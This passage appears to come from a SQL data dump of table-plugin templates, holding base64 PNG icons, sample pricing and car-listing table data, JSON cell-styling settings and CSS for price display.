ZroDIiH0zlaPfR1qkpow04vAGiI0RoKy1IE14FHo9gQzfWimbln6M7IsFXvt73u1mX4EJhDAORFC/qUKbB7Q41iSjG8lyfi3WmDSTj4h0gaO1bG9jL1u1IHmLEvdsnSnzDXM9K2ZdgagVK+LyALu4H68OhUe1/M4HWnILwdwvxRCvjpgBNqIACzQkB9eMM1VQQMdzfQCsB5zKyHk1+oecMdMP4+q1w5FrRlZ2sB9ElhGBNwRkY3GkchMDfdVYLn4Gw7CG3e/KUcg6wAzIkJU+zvwIIT8Sak2lmnLTuupEQSl0NPxE80UPA7wDPeTJVnp83Pgbtz3gU4I+WxFqwlgEfcrlXt6wNUQ8u4eU8x0DHgB3ACIT9nEfRbhHM58aV5R81uhmy8d6LKZGvAKOD9UFqcQi0XgXgj57zqNZe846CTwFCeNqffA7RDyd4cxbV+X7Yy26HMf2AYeh5D/PewU/AOGGq7XOZb0eQAAAABJRU5ErkJggg==\\\\\" />\",\"<img width=\\\\\"20\\\\\" height=\\\\\"18\\\\\" title=\\\\\"\\\\\" alt=\\\\\"\\\\\" src=\\\\\"data:image/png;base64,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\\\\\" />\"],[null,\"<a href=\\\\\"#\\\\\" class=\\\\\"cart\\\\\">Add to cart</a>\",\"<a href=\\\\\"#\\\\\" class=\\\\\"cart\\\\\">Add to cart</a>\",\"<a href=\\\\\"#\\\\\" class=\\\\\"cart hot\\\\\">Add to cart</a>\",\"<a href=\\\\\"#\\\\\" class=\\\\\"cart\\\\\">Add to cart</a>\"]]','{     \"table\":{        \"width\":776,      \"alternate_row_even_color\":\"f7f7f7\",      \"alternate_row_odd_color\":\"#fafafa\"   },   \"rows\":{        \"0\":[           0,         {              \"height\":75,            \"cell_background_color\":\"#43B9C8\",            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"17\",            \"cell_font_color\":\"#ffffff\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\",            \"cell_font_bold\":true         }      ],      \"1\":[           1,         {              \"cell_type\":\"html\",            \"height\":105,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"22\",            \"cell_font_color\":\"#4d4d4d\",            \"cell_font_color\":\"#000000\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"2\":[           2,         {              \"height\":31,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"3\":[           3,         {              \"height\":31,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_font_color\":\"#4d4d4d\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"4\":[           4,         {              \"height\":31,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_font_color\":\"#4d4d4d\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"5\":[           5,         {              \"height\":31,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_font_color\":\"#4d4d4d\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"6\":[           6,         {              \"height\":31,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_font_color\":\"#4d4d4d\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"7\":[           7,         {              \"height\":31,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_font_color\":\"#4d4d4d\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"8\":[           8,         {              \"cell_type\":\"html\",            \"height\":31,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_font_color\":\"#8a8a8a\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ],      \"9\":[           9,         {              \"cell_type\":\"html\",            \"height\":80,            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"14\",            \"cell_font_color\":\"#8a8a8a\",            \"cell_text_align\":\"center\",            \"cell_vertical_align\":\"middle\"         }      ]   },   \"cols\":{        \"0\":[           0,         {              \"width\":128,            \"cell_font_color\":\"#8a8a8a\",            \"cell_border_right\" : \"1px solid #ccc\"         }      ],      \"1\":[           1,         {                          \"width\":162,            \"cell_border_right\" : \"1px solid #ccc\"         }      ],      \"2\":[           2,         {              \"width\":162,            \"cell_border_right\" : \"1px solid #ccc\"         }      ],      \"3\":[           3,         {              \"width\":162,            \"cell_border_right\" : \"1px solid #ccc\"         }      ],      \"4\":[           4,         {              \"width\":162         }      ]   },   \"cells\":{              \"0!0\":[           0,         0,         {              \"cell_font_color\":\"#FFFFFF\",            \"cell_background_radius_left_top\":\"5\"         }      ],      \"0!4\":[           0,         4,         {              \"cell_background_radius_right_top\":\"5\"         }      ]   }}','.price_wrapper {    \\\\n  position : relative;    \\\\n  font-weight : bold;    \\\\n  .currency {        \\\\n    position: relative;        \\\\n    top: -20px;        \\\\n    left: 4px;        \\\\n    font-size: 130%;    \\\\n  }    \\\\n  .price {        \\\\n    font-size: 300%;        \\\\n    color : #43B9C8;    \\\\n  }    \\\\n  .cents {        \\\\n    position: relative;        \\\\n    top: -30px;        \\\\n    font-size: 100%;    \\\\n  }   \\\\n  .recurrence {        \\\\n    position: absolute;        \\\\n    left:  00%;       \\\\n    bottom : -100%;        \\\\n    color: #999;        \\\\n    font-size: 60%;        \\\\n    font-weight: normal;    \\\\n  }\\\\n}\\\\na.cart {    \\\\n  padding: 10px;    \\\\n  background: #000;    \\\\n  border-radius: 5px;    \\\\n  display: inline-block;   \\\\n  color: #FFF;    \\\\n  text-decoration: none;   \\\\n  font-weight: bold;    \\\\n  &.hot {        \\\\n    background-color: #43B9C8;    \\\\n  }\\\\n}','blue.png',2),(3,'[[\"#\",\"Make\",\"Model\",\"Year\",\"Price\"],[\"1\",\"Honda\",\"Accord\",\"2009\",\"$12000\"],[\"2\",\"Toyota\",\"Camry\",\"2012\",\"$14900\"],[\"3\",\"Hyundai\",\"Elantra\",\"2010\",\"$22000\"],[\"4\",\"Honda\",\"Accord\",\"2009\",\"$12000\"],[\"5\",\"Toyota\",\"Camry\",\"2012\",\"$14900\"],[\"6\",\"Hyundai\",\"Elantra\",\"2010\",\"$22000\"],[\"7\",\"Honda\",\"Accord\",\"2009\",\"$12000\"],[\"8\",\"Toyota\",\"Camry\",\"2012\",\"$14900\"]]','{   \"table\":{      \"alternate_row_even_color\":\"#fafafa\",      \"use_sortable\":\"1\"   },   \"rows\":{      \"0\":[         0,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_family\":\"Arial\",            \"cell_font_size\":\"13\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"2px solid #707070\",            \"cell_background_color\":\"#ffffff\",            \"cell_font_bold\":true,            \"cell_vertical_align\":\"middle\"         }      ],      \"1\":[         1,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ],      \"2\":[         2,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ],      \"3\":[         3,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ],      \"4\":[         4,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ],      \"5\":[         5,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ],      \"6\":[         6,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ],      \"7\":[         7,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ],      \"8\":[         8,         {            \"height\":30,            \"cell_padding_top\":\"3\",            \"cell_padding_right\":\"3\",            \"cell_padding_bottom\":\"3\",            \"cell_padding_left\":\"3\",            \"cell_font_color\":\"#333333\",            \"cell_border_bottom\":\"1px solid #d6d6d6\",            \"cell_vertical_align\":\"middle\"         }      ]   },   \"cols\":{      \"0\":[         0,         {            \"width\":50,            \"cell_text_align\":\"center\",            \"cell_font_bold\":true         }      ],      \"1\":[         1,         {            \"width\":122,\"cell_text_align\":\"center\"         }      ],      \"2\":[         2,         {            \"width\":137,\"cell_text_align\":\"center\"         }      ],      \"3\":[         3,         {            \"width\":133,\"cell_text_align\":\"center\"         }      ],      \"4\":[         4,         {            \"width\":150,\"cell_text_align\":\"center\"         }      ],      \"5\":[         5,         {            \"width\":50,\"cell_text_align\":\"center\"         }      ]   },   \"cells\":{         }}','','minimalist.png',3),(4,'[[\"\",\"MOST POPULAR\",null],[\"PERSONAL\",\"PROFESSIONAL\",\"BUSINES\"],[\"<div class=\\\\\"price_wrapper\\\\\">   <span class=\\\\\"currency\\\\\">$</span>   <span class=\\\\\"price\\\\\">8</span>   <span class=\\\\\"recurrence\\\\\">/MO</span>    </div>\",\"<div class=\\\\\"price_wrapper\\\\\">   <span class=\\\\\"currency\\\\\">$</span>   <span class=\\\\\"price\\\\\">16</span>   <span class=\\\\\"recurrence\\\\\">/MO</span>    </div>\",\"<div class=\\\\\"price_wrapper\\\\\">   <span class=\\\\\"currency\\\\\">$</span>   <span class=\\\\\"price\\\\\">24</span>   <span class=\\\\\"recurrence\\\\\">/MO</span>    </div>\"],[\"Billed annuallyor $10 month-to-month.\",\"Billed annuallyor $20 month-to-month.\",\"Billed annuallyor $30 month-to-month.\"],[\"20 Pages, Galleries, and Blogs with 500 GB Bandwidth, 2 GB Storage, and 2 Contributors\",\"Unlimited Pages, Galleries, and Blogs, with Unlimited Storage, Bandwidth, and Contributors\",\"Unlimited Pages, Galleries, and Blogs, with Unlimited Storage, Bandwidth, and Contributors\"],[\"Fully Integrated E-Commerce\",\"Fully Integrated E-Commerce\",\"Fully Integrated E-Commerce\"],[\"Sell 1 Product & Accept Donations\",\"Sell up to 20 Products\",\"Sell Unlimited Products\"],[\"Custom Domain <span class=\\\\\"highlighted\\\\\">FREE</span>\",\"Developer Platform\",\"Real-Time Carrier Shipping\"],[\"24/7 Customer Support\",\"Custom Domain <span class=\\\\\"highlighted\\\\\">FREE</span>\",\"Label Printing via ShipStation\"],[null,\"24/7 Customer Support\",\"Integrated Accounting by Xero\"],[null,null,\"Developer Platform\"],[null,null,\"Mobile Website and Store\"],[null,null,\"Custom Domain <span class=\\\\\"highlighted\\\\\">FREE</span>\"],[null,null,\"24/7 Customer Support\"]]','{     \"table\":{  \"width\":959   },   \"rows\":{  \"0\":[     0,   {  \"height\":30   }      ],      \"1\":[     1,   {  \"height\":54,      \"cell_text_align\":\"center\",      \"cell_background_color\":\"#000000\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"17\",      \"cell_font_color\":\"#ffffff\",      \"cell_font_bold\":true,      \"cell_border_top\":\"1px solid #ffffff\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_vertical_align\":\"middle\"   }      ],      \"2\":[     2,   {  \"height\":130,      \"cell_background_color\":\"#000000\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"28\",      \"cell_font_color\":\"#ffffff\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_text_align\":\"center\",      \"cell_type\":\"html\",      \"cell_vertical_align\":\"middle\"   }      ],      \"3\":[     3,   {  \"height\":43,      \"cell_background_color\":\"#000000\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"11\",      \"cell_font_color\":\"#6e6e6e\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_italic\":true,      \"cell_text_align\":\"center\"   }      ],      \"4\":[     4,   {  \"height\":81   }      ],      \"5\":[     5,   {  \"height\":41   }      ],      \"6\":[     6,   {  \"height\":41   }      ],      \"7\":[     7,   {  \"height\":41   }      ],      \"8\":[     8,   {  \"height\":41   }      ],      \"9\":[     9,   {  \"height\":41   }      ],      \"10\":[     10,   {  \"height\":41   }      ],      \"11\":[     11,   {  \"height\":41   }      ],      \"12\":[     12,   {  \"height\":41   }      ],      \"13\":[     13,   {  \"height\":41   }      ]   },   \"cols\":{  \"0\":[     0,   {  \"width\":324   }      ],      \"1\":[     1,   {  \"width\":321   }      ],      \"2\":[     2,   {  \"width\":314   }      ]   },   \"cells\":{  \"0!1\":[     0,   1,   {  \"cell_background_color\":\"#57ca8e\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"10\",      \"cell_font_color\":\"#ffffff\",      \"cell_vertical_align\":\"middle\",      \"cell_text_align\":\"center\",      \"cell_border_bottom\":\"1px solid #ffffff\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"4!0\":[     4,   0,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"5!0\":[     5,   0,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"6!0\":[     6,   0,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_type\":\"html\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"7!0\":[     7,   0,   {  \"cell_background_color\":\"#f7f7f7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_type\":\"html\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"4!1\":[     4,   1,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"5!1\":[     5,   1,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"6!1\":[     6,   1,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"7!1\":[     7,   1,   {  \"cell_background_color\":\"#f7f7f7\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"0!0\":[     0,   0,   {  \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"8!1\":[     8,   1,   {  \"cell_type\":\"html\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"9!1\":[     9,   1,   {  \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"8!0\":[     8,   0,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"9!0\":[     9,   0,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"10!0\":[     10,   0,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"10!1\":[     10,   1,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"11!0\":[     11,   0,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"11!1\":[     11,   1,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"12!0\":[     12,   0,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"12!1\":[     12,   1,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"13!0\":[     13,   0,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"13!1\":[     13,   1,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"20px solid #ffffff\"   }      ],      \"0!2\":[     0,   2,   {  \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"10\",      \"cell_font_color\":\"#ffffff\",      \"cell_vertical_align\":\"middle\",      \"cell_text_align\":\"center\",      \"cell_border_bottom\":\"1px solid #ffffff\",      \"cell_border_right\":\"0px solid #ffffff\"   }      ],      \"4!2\":[     4,   2,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"5!2\":[     5,   2,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      